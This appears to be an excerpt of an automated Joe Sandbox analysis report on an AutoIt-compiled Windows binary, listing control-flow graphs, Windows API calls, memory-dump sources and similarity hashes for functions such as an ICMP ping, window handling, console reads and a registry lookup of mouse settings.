                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                        • String ID: Ping
                                                                                                                                                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                        • Opcode ID: 71d3d0ba843d2a955cc4b85db98d844c4226c06e2db55c4c32105064cd7320ca
                                                                                                                                                                                                                                                                                        • Instruction ID: 9fcab1de8dee4c99b750552c9af426150cf02221985391f85a7035f6fde79e0c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71d3d0ba843d2a955cc4b85db98d844c4226c06e2db55c4c32105064cd7320ca
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2791D431A046019FD720EF15C888F56BBE8BF44328F148699F565CB6A2C735EC86EB81
                                                                                                                                                                                                                                                                                        Function 00F0370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 577 f0370f-f03724 578 f03784-f03786 577->578 579 f03726-f03729 577->579 578->579 580 f03788 578->580 581 f0378a 579->581 582 f0372b-f03732 579->582 585 f0376f-f03777 DefWindowProcW 580->585 586 f43df4-f43e1c call f02f92 call f1f23c 581->586 587 f03790-f03795 581->587 583 f03804-f0380c PostQuitMessage 582->583 584 f03738-f0373d 582->584 592 f037b8-f037ba 583->592 588 f03743-f03747 584->588 589 f43e61-f43e75 call f6c8f7 584->589 591 f0377d-f03783 585->591 621 f43e21-f43e28 586->621 593 f03797-f0379a 587->593 594 f037bc-f037e3 SetTimer RegisterWindowMessageW 587->594 595 f0374d-f03752 588->595 596 f0380e-f03818 call f1fcad 588->596 589->592 612 f43e7b 589->612 592->591 600 f037a0-f037b3 KillTimer call f03907 call f059ff 593->600 601 f43d95-f43d98 593->601 594->592 597 f037e5-f037f0 CreatePopupMenu 594->597 602 f43e46-f43e4d 595->602 603 f03758-f0375d 595->603 614 f0381d 596->614 597->592 600->592 607 f43dd0-f43def MoveWindow 601->607 608 f43d9a-f43d9e 601->608 602->585 618 f43e53-f43e5c call f61423 602->618 610 f037f2-f03802 call f0381f 603->610 611 f03763-f03769 603->611 607->592 615 f43da0-f43da3 608->615 616 f43dbf-f43dcb SetFocus 608->616 610->592 611->585 611->621 612->585 614->592 615->611 622 f43da9-f43dba call f02f92 615->622 616->592 618->585 621->585 626 f43e2e-f43e41 call f03907 call f0396b 621->626 622->592 626->585
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F03709,?,?), ref: 00F03777
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00F03709,?,?), ref: 00F037A3
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F037C6
                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F03709,?,?), ref: 00F037D1
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F037E5
                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F03806
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                        • Opcode ID: 2e0d4299a766365fe054fb9e4715ee09d88c1c114c73448577ff27138aeda87a
                                                                                                                                                                                                                                                                                        • Instruction ID: 75f9b6aac8163f45598b333307e4f64a2b9d8de542e7717706b1fe27d020d13e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e0d4299a766365fe054fb9e4715ee09d88c1c114c73448577ff27138aeda87a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F14126F2A08149BBDB146B7CDC59B7D3B7EE710310F144126F901862D1CA799B44B7A3
                                                                                                                                                                                                                                                                                        Function 00F390C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 633 f390c5-f390d5 634 f390d7-f390ea call f2f636 call f2f649 633->634 635 f390ef-f390f1 633->635 649 f39471 634->649 636 f390f7-f390fd 635->636 637 f39459-f39466 call f2f636 call f2f649 635->637 636->637 639 f39103-f3912e 636->639 654 f3946c call f32b5c 637->654 639->637 642 f39134-f3913d 639->642 646 f39157-f39159 642->646 647 f3913f-f39152 call f2f636 call f2f649 642->647 652 f39455-f39457 646->652 653 f3915f-f39163 646->653 647->654 655 f39474-f39479 649->655 652->655 653->652 657 f39169-f3916d 653->657 654->649 657->647 660 f3916f-f39186 657->660 662 f391a3-f391ac 660->662 663 f39188-f3918b 660->663 664 f391ca-f391d4 662->664 665 f391ae-f391c5 call f2f636 call f2f649 call f32b5c 662->665 666 f39195-f3919e 663->666 667 f3918d-f39193 663->667 670 f391d6-f391d8 664->670 671 f391db-f391dc call f33b93 664->671 697 f3938c 665->697 668 f3923f-f39259 666->668 667->665 667->666 673 f3925f-f3926f 668->673 674 f3932d-f39336 call f3fc1b 668->674 670->671 679 f391e1-f391f9 call f32d38 * 2 671->679 673->674 678 f39275-f39277 673->678 685 f393a9 674->685 686 f39338-f3934a 674->686 678->674 682 f3927d-f392a3 678->682 701 f39216-f3923c call f397a4 679->701 702 f391fb-f39211 call f2f649 call f2f636 679->702 682->674 687 f392a9-f392bc 682->687 689 f393ad-f393c5 ReadFile 685->689 686->685 691 f3934c-f3935b GetConsoleMode 686->691 687->674 692 f392be-f392c0 687->692 695 f39421-f3942c GetLastError 689->695 696 f393c7-f393cd 689->696 691->685 698 f3935d-f39361 691->698 692->674 699 f392c2-f392ed 692->699 703 f39445-f39448 695->703 704 f3942e-f39440 call f2f649 call f2f636 695->704 696->695 705 f393cf 696->705 707 f3938f-f39399 call f32d38 697->707 698->689 706 f39363-f3937d ReadConsoleW 698->706 699->674 700 f392ef-f39302 699->700 700->674 709 f39304-f39306 700->709 701->668 702->697 716 f39385-f3938b call f2f613 703->716 717 f3944e-f39450 703->717 704->697 713 f393d2-f393e4 705->713 714 f3937f GetLastError 706->714 715 f3939e-f393a7 706->715 707->655 709->674 719 f39308-f39328 709->719 713->707 723 f393e6-f393ea 713->723 714->716 715->713 716->697 717->707 719->674 727 f39403-f3940e 723->727 728 f393ec-f393fc call f38de1 723->728 733 f39410 call f38f31 727->733 734 f3941a-f3941f call f38c21 727->734 740 f393ff-f39401 728->740 738 f39415-f39418 733->738 734->738 738->740 740->707
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 19a0c33b8ccfec08eb16c241866e18f6ecfc8226911c60b6d18b9a3d54a51ad1
                                                                                                                                                                                                                                                                                        • Instruction ID: 2657819b15352666734b858bfc42a60d41a0c2eaa86bc1688043ce592eb7c367
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19a0c33b8ccfec08eb16c241866e18f6ecfc8226911c60b6d18b9a3d54a51ad1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EC1F2B1E08249AFDF11DFA8D841BADBBB4BF09330F144059E554A7392C7B59942EB60
                                                                                                                                                                                                                                                                                        Function 00F1AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 741 f1ac3e-f1b063 call f08ec0 call f1bc58 call f0e6a0 748 f58584-f58591 741->748 749 f1b069-f1b073 741->749 750 f58596-f585a5 748->750 751 f58593 748->751 752 f1b079-f1b07e 749->752 753 f5896b-f58979 749->753 754 f585a7 750->754 755 f585aa 750->755 751->750 758 f1b084-f1b090 call f1b5b6 752->758 759 f585b2-f585b4 752->759 756 f5897e 753->756 757 f5897b 753->757 754->755 755->759 760 f58985-f5898e 756->760 757->756 764 f585bd 758->764 766 f1b096-f1b0a3 call f0c98d 758->766 759->764 762 f58990 760->762 763 f58993 760->763 762->763 769 f5899c-f589eb call f0e6a0 call f1bbbe * 2 763->769 768 f585c7 764->768 772 f1b0ab-f1b0b4 766->772 773 f585cf-f585d2 768->773 802 f1b1e0-f1b1f5 769->802 803 f589f1-f58a03 call f1b5b6 769->803 775 f1b0b8-f1b0d6 call f24d98 772->775 776 f1b158-f1b16f 773->776 777 f585d8-f58600 call f24cd3 call f07ad5 773->777 796 f1b0e5 775->796 797 f1b0d8-f1b0e1 775->797 779 f58954-f58957 776->779 780 f1b175 776->780 811 f58602-f58606 777->811 812 f5862d-f58651 call f07b1a call f0bd98 777->812 785 f58a41-f58a79 call f0e6a0 call f1bbbe 779->785 786 f5895d-f58960 779->786 787 f588ff-f58920 call f0e6a0 780->787 788 f1b17b-f1b17e 780->788 785->802 846 f58a7f-f58a91 call f1b5b6 785->846 786->769 793 f58962-f58965 786->793 787->802 816 f58926-f58938 call f1b5b6 787->816 794 f1b184-f1b187 788->794 795 f58729-f58743 call f1bbbe 788->795 793->753 793->802 804 f1b18d-f1b190 794->804 805 f586ca-f586e0 call f06c03 794->805 823 f5888f-f588b5 call f0e6a0 795->823 824 f58749-f5874c 795->824 796->768 808 f1b0eb-f1b0fc 796->808 797->775 806 f1b0e3 797->806 818 f1b1fb-f1b20b call f0e6a0 802->818 819 f58ac9-f58acf 802->819 837 f58a05-f58a0d 803->837 838 f58a2f-f58a3c call f0c98d 803->838 814 f58656-f58659 804->814 815 f1b196-f1b1b8 call f0e6a0 804->815 805->802 835 f586e6-f586fc call f1b5b6 805->835 806->808 808->753 817 f1b102-f1b11c 808->817 811->812 827 f58608-f5862b call f0ad40 811->827 812->814 814->753 833 f5865f-f58674 call f06c03 814->833 815->802 854 f1b1ba-f1b1cc call f1b5b6 815->854 857 f58945 816->857 858 f5893a-f58943 call f0c98d 816->858 817->773 832 f1b122-f1b154 call f1bbbe call f0e6a0 817->832 819->772 825 f58ad5 819->825 823->802 879 f588bb-f588cd call f1b5b6 823->879 844 f587bf-f587de call f0e6a0 824->844 845 f5874e-f58751 824->845 825->753 827->811 827->812 832->776 833->802 876 f5867a-f58690 call f1b5b6 833->876 882 f5870d-f58716 call f08ec0 835->882 883 f586fe-f5870b call f08ec0 835->883 852 f58a0f-f58a13 837->852 853 f58a1e-f58a29 call f0b4b1 837->853 889 f58ac2-f58ac4 838->889 844->802 881 f587e4-f587f6 call f1b5b6 844->881 860 f58757-f58774 call f0e6a0 845->860 861 f58ada-f58ae8 845->861 893 f58ab5-f58abe call f0c98d 846->893 894 f58a93-f58a9b 846->894 852->853 869 f58a15-f58a19 852->869 853->838 900 f58b0b-f58b19 853->900 901 f1b1d2-f1b1de 854->901 902 f586ba-f586c3 call f0c98d 854->902 875 f58949-f5894f 857->875 858->875 860->802 904 f5877a-f5878c call f1b5b6 860->904 867 f58aed-f58afd 861->867 868 f58aea 861->868 884 f58b02-f58b06 867->884 885 f58aff 867->885 868->867 886 f58aa1-f58aa3 869->886 875->802 914 f58692-f5869b call f0c98d 876->914 915 f5869d-f586ab call f08ec0 876->915 919 f588cf-f588dc call f0c98d 879->919 920 f588de 879->920 881->802 922 f587fc-f58805 call f1b5b6 881->922 923 f58719-f58724 call f08577 882->923 883->923 884->818 885->884 886->802 889->802 893->889 905 f58a9d 894->905 906 f58aa8-f58ab3 call f0b4b1 894->906 911 f58b1e-f58b21 900->911 912 f58b1b 900->912 901->802 902->805 937 f5879f 904->937 938 f5878e-f5879d call f0c98d 904->938 905->886 906->893 906->900 911->760 912->911 944 f586ae-f586b5 914->944 915->944 930 f588e2-f588e9 919->930 920->930 949 f58807-f58816 call f0c98d 922->949 950 f58818 922->950 923->802 931 f588f5 call f03907 930->931 932 f588eb-f588f0 call f0396b 930->932 948 f588fa 931->948 932->802 946 f587a3-f587ae call f29334 937->946 938->946 944->802 946->753 959 f587b4-f587ba 946->959 948->802 954 f5881c-f5883f 949->954 950->954 957 f58841-f58848 954->957 958 f5884d-f58850 954->958 957->958 960 f58860-f58863 958->960 961 f58852-f5885b 958->961 959->802 962 f58865-f5886e 960->962 963 f58873-f58876 960->963 961->960 962->963 963->802 964 f5887c-f5888a 963->964 964->802
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                        • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                        • Opcode ID: efacba671d321dd100d1913d2989a5c0b27eeb4aff6e369cf7c4ef94b149c09f
                                                                                                                                                                                                                                                                                        • Instruction ID: 252097f2618619d2f151fd7f91d215a0b23a4636196ddf86851c3b6a0068af45
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efacba671d321dd100d1913d2989a5c0b27eeb4aff6e369cf7c4ef94b149c09f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8628A70508341DFC724DF24C494AAABBE1FF88354F14891EE9899B352DB71D94AEF82
                                                                                                                                                                                                                                                                                        Function 00F035B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1001 f035b3-f03623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F035E1
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03602
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F03616
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F0361F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                        • Opcode ID: 78518ad33d345f046788a25dc7ab9329386f88ba618fa81783d42ed76ead9721
                                                                                                                                                                                                                                                                                        • Instruction ID: ffc43bf559bc5339fd77d929d3c58afa90d3f6e44ed98a6c6ec904c91788232b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78518ad33d345f046788a25dc7ab9329386f88ba618fa81783d42ed76ead9721
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF0DA716412987AEB7157276C08E377FBED7D6F50B10001FBA04A7160D66A1851FAB1
                                                                                                                                                                                                                                                                                        Function 00F0663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1002 f0663e-f06654 LoadLibraryA 1003 f06674-f06678 1002->1003 1004 f06656-f06664 GetProcAddress 1002->1004 1005 f06666 1004->1005 1006 f06669-f0666b 1004->1006 1005->1006 1006->1003 1007 f0666d-f0666e FreeLibrary 1006->1007 1007->1003
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0664A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F0665C
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0666E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                        • Opcode ID: 9308193d5e556c351655333e18e8f8d93ded8c221a2e0a875bd304cb67b24ccb
                                                                                                                                                                                                                                                                                        • Instruction ID: 69bb1559b3bb6da5dc6b8aa17a8754a90f67537665eeb5c1f58fb3c14b6815c0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9308193d5e556c351655333e18e8f8d93ded8c221a2e0a875bd304cb67b24ccb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E0CD37A0152217E2211725BC1CB5E75689F82F3AB150117FD04E6150DF60CC41B4E5
                                                                                                                                                                                                                                                                                        Function 00F061A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F45287
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F06299
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                        • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                        • Opcode ID: 698e6daaffcfb0768c44cbc3d9b55d0aad13bbe2d85b01031dbd3fc2fcdb6704
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b3a5331678bd11d39dd5f7fa8da47fbbbe6c64ba171bf7efa156c533d72bf85
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 698e6daaffcfb0768c44cbc3d9b55d0aad13bbe2d85b01031dbd3fc2fcdb6704
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8341A471408305ABC721EB60DC41ADF7BD8AF94720F00461EF995921E1EB78D659FB92
                                                                                                                                                                                                                                                                                        Function 00F058CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1059 f058cb-f058d6 1060 f05948-f0594a 1059->1060 1061 f058d8-f058dd 1059->1061 1063 f0593b-f0593e 1060->1063 1061->1060 1062 f058df-f058f7 RegOpenKeyExW 1061->1062 1062->1060 1064 f058f9-f05918 RegQueryValueExW 1062->1064 1065 f0591a-f05925 1064->1065 1066 f0592f-f0593a RegCloseKey 1064->1066 1067 f05927-f05929 1065->1067 1068 f0593f-f05946 1065->1068 1066->1063 1069 f0592d 1067->1069 1068->1069 1069->1066
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F058EF
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F05910
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F058BE,SwapMouseButtons,00000004,?), ref: 00F05932
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                        • Opcode ID: 0158f27dcf94b3dadb21a6974c3f1d872741fb9abe1333ffc0c14770d1f40fdd
                                                                                                                                                                                                                                                                                        • Instruction ID: d94982b1fed0b73c103707d6ba3aa42f9f9f11781c703dd18afa3d2043f81495
